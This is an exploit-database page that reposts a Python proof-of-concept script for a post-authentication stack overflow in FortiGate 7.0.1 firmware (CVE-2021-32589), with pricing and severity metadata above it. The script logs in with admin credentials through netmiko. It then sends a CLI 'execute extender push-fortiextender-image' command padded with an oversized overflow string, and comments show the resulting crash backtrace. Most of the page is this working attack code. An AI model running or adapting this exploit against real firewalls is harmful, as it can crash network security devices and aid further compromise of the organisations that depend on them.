Advertisement






Fortigate 7.0.1 Stack Overflow

CVE Category Price Severity
CVE-2021-32589 CWE-119 $10,000 High
Author Risk Exploitation Type Date
Mudhook High Remote 2023-05-03
CVSS
N/A (Not specified in the source)

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023050004

Below is a copy:

Fortigate 7.0.1 Stack Overflow
c@ubuntu:~/LABS$ cat fp17.py
#!/usr/bin/env python3
# fortigate 7.0.1 postauth stack overflow 0day
#
# more: 
#   https://code610.blogspot.com/2023/04/fuzzing-fortigate-7.html
# 
# Pid: 00243, application: newcli, 
# Firmware: FortiGate-VM64 v7.0.1,build0157b0157,210714 (GA) (Release), 
# Signal 6 received, Backtrace: 
# [0x7f498e5f16f0] [0x7f498e5f2d47] [0x7f498e633f47] [0x7f498e6c2c9e] 
# [0x7f498e6c2c62] [0x01f10f4d] [0x4343434342424242] 
#
# 

from netmiko import Netmiko

login = 'admin'
passwd = 'admin'
target = '192.168.56.222'

fw_01 = {
        'host' : target,
        'username' : login,
        'password' : passwd,
        'device_type' : 'fortinet'
}

print("> connecting to the target: %s" % target)
net_connect = Netmiko(**fw_01)
# print( net_connect.find_prompt() )

payload = 'execute extender push-fortiextender-image '
payload += 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD' + 'F'*300 + ' asd'

command = payload

full_config_cmd = net_connect.send_command( command )
print(full_config_cmd)

print("done")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.